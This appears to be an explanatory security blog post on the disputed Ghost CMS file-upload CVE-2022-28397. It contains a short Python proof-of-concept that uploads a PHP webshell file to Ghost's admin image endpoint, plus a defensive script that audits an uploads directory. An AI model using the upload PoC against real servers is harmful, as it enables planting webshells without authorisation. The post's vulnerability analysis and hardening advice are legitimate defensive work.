
Overview

A security advisory surfaced about CVE-2022-28397, which raises concerns about an arbitrary file upload vulnerability in the well-known Ghost CMS—specifically version 4.42. According to the report, an attacker with access to the "file upload" module could potentially upload a malicious file and perform code execution, effectively compromising the server.

But, and it’s a big BUT: Ghost’s team disputes this claim, asserting that _only authenticated and trusted users can upload files_, and this is intentional by design. Let’s dig into the details of the alleged vulnerability, see a demo exploit, and settle into why the vendor says, "Don’t call it a bug."

What’s the Alleged Vulnerability?

According to the original advisory on GitHub, the vulnerability stems from a lack of proper checks during file upload. Basically, the attacker uploads a crafted file through the admin interface, and Ghost will accept it, potentially allowing remote code execution (RCE).

Code Snippet: Proof-of-Concept (PoC)

> Disclaimer: _This is for educational purposes only. Do not attempt without explicit permission._

Here's a Python code snippet using requests to upload a malicious file to a Ghost instance:

```python
import requests

# GHOST CMS URL (admin image upload endpoint)
url = "http://your-ghost-cms.com/ghost/api/admin/images/upload/"

# YOUR SESSION TOKEN (replace after logging in via browser/devtools);
# note that the endpoint refuses the request without valid admin credentials
headers = {
    'Authorization': 'Ghost <your_session_token>'
}

# Malicious file (example: PHP webshell), sent as a multipart form field
with open('shell.php', 'rb') as fh:
    files = {
        'file': ('shell.php', fh, 'application/octet-stream')
    }
    response = requests.post(url, headers=headers, files=files)

print("Status Code:", response.status_code)
print("Response:", response.text)
```

Important: By default, Ghost's uploads are stored in /content/images/ and not processed as executable code on most webserver configs, so RCE is unlikely unless you misconfigure your server.

Vendor's Standpoint

The Ghost Foundation Team strongly disputes CVE-2022-28397’s threat, referencing their security docs and official statement:

> As detailed in Ghost's security documentation, files are only uploaded and published by trusted users. The system does not allow anonymous or untrusted users to upload. This is intentional functionality.

TL;DR:

- The researcher's PoC only works if you already have admin access (not a privilege escalation).

- Under normal setups, even if you upload a .php file, Ghost stores it in a way that the server never "runs" the code—it treats it as a download, not executable code.
- If your server is misconfigured (i.e., runs code from /content/images/), that's not Ghost's fault.

Short answer: Probably not.

- If you don't give random people admin/editor/author access, you're safe.
- As a good practice, never allow uploads of executable files and keep your webserver configurations tight.

Key Takeaways

- CVE-2022-28397 is disputed—This “vulnerability” can’t be exploited by outsiders, only by trusted users, and only under weird server misconfigurations.
- Never give CMS backend access to untrusted individuals.
- Check your web server: Make sure it only executes files from expected directories (e.g., /public), not uploads.
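The two operational takeaways above (don't let executable files sit in the uploads tree, and verify what the server is actually holding) can be turned into a routine check. The script below is an added example written for this post, not code from Ghost or from the original advisory: it walks a Ghost-style `content/images` directory, flags any file whose extension is outside an image allowlist, and also catches files that carry an image extension but do not start with that format's magic bytes (a script renamed to `.png`, for instance). The directory layout and the three sample files are constructed here for the demo; point `audit_uploads` at a real `content/images` path to use it.

```python
import tempfile
from pathlib import Path

# File-type signatures for the formats an image uploads directory should contain.
# (Added example; the allowlist is an assumption for this demo, not Ghost's own list.)
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "webp": b"RIFF",  # RIFF container; bytes 8..12 must additionally read "WEBP"
}
ALLOWED = set(MAGIC)  # extension allowlist for the uploads tree


def classify(path: Path) -> str:
    """Return 'ok', 'disallowed-extension' or 'content-mismatch' for one file."""
    ext = path.suffix.lower().lstrip(".")
    if ext not in ALLOWED:
        return "disallowed-extension"
    with path.open("rb") as fh:
        head = fh.read(12)
    if not head.startswith(MAGIC[ext]):
        return "content-mismatch"
    if ext == "webp" and head[8:12] != b"WEBP":
        return "content-mismatch"
    return "ok"


def audit_uploads(root: Path) -> dict:
    """Walk an uploads tree and group every regular file by its classification."""
    findings = {"ok": [], "disallowed-extension": [], "content-mismatch": []}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            findings[classify(path)].append(str(path.relative_to(root)))
    return findings


def build_sample_tree() -> Path:
    """Create a throwaway directory holding three constructed sample files."""
    root = Path(tempfile.mkdtemp(prefix="ghost-images-"))
    (root / "2022" / "04").mkdir(parents=True)
    # A real PNG header: passes both checks.
    (root / "2022" / "04" / "logo.png").write_bytes(MAGIC["png"] + b"\x00" * 16)
    # Wrong extension outright: caught by the allowlist.
    (root / "2022" / "04" / "shell.php").write_bytes(b"<?php /* not an image */ ?>")
    # Script dressed up as an image: extension passes, magic bytes do not.
    (root / "2022" / "04" / "avatar.png").write_bytes(b"<?php /* not an image */ ?>")
    return root


if __name__ == "__main__":
    report = audit_uploads(build_sample_tree())
    for category, files in report.items():
        print(f"{category}: {files}")
```

Run it on a schedule (or from a deploy hook) and treat any entry outside `ok` as something to remove and investigate; the `content-mismatch` case is the one a pure extension filter misses, which is why the magic-byte check is worth the extra few lines.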

References and Further Reading

- GitHub CVE-2022-28397 issue log
- Official Ghost Security Overview
- Vendor statement on GitHub
- Ghost source code
- Example Media Upload API Docs

Final Words

CVE-2022-28397 is a good reminder to never trust user uploads and always validate both application permissions and server behavior. Ghost CMS is designed to be safe, _as long as best practices are followed_.

Stay secure, keep learning, and always RTFM (read the fine manual)!

Timeline

Published on: 04/12/2022 17:15:00 UTC
Last modified on: 06/13/2022 18:15:00 UTC